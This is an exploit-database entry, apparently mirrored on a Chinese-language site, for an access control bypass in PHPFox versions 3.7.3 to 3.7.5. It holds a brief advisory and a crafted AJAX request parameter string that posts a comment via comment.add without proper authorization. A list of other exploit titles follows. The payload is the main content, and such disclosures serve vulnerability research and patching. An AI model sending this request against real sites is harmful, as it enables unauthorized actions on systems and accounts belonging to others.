PHPFox – Access Control Security Bypass

Exploit Database
16 阅读

作者： Wesley Henrique

日期： 2014-04-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39139/

source: https://www.securityfocus.com/bid/66677/info

PHPFox is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.

Attackers can leverage this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.

PHPFox 3.7.3, 3.7.4 and 3.7.5 are vulnerable 

&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290

last Exploits
PHPFox – Access Control Security Bypass的更多信息

Dolibarr ERP-CRM 14.0.2 – Stored Cross-Site Scripting (XSS) / Privilege Escalation：
CubeCart 3.0.4 – SQL Injection：
vBulletin 3.8.4/3.8.5 – Registration Bypass：
SilverStripe CMS 2.4.5 – Multiple Cross-Site Scripting Vulnerabilities：
ISPConfig 3.0.54p1 – (Authenticated) Admin Privilege Escalation：
Customer Support System 1.0 – Cross-Site Request Forgery：
Software Index – Arbitrary File Upload：
WordPress Plugin MoodThingy Widget 0.8.7 – Blind SQL Injection：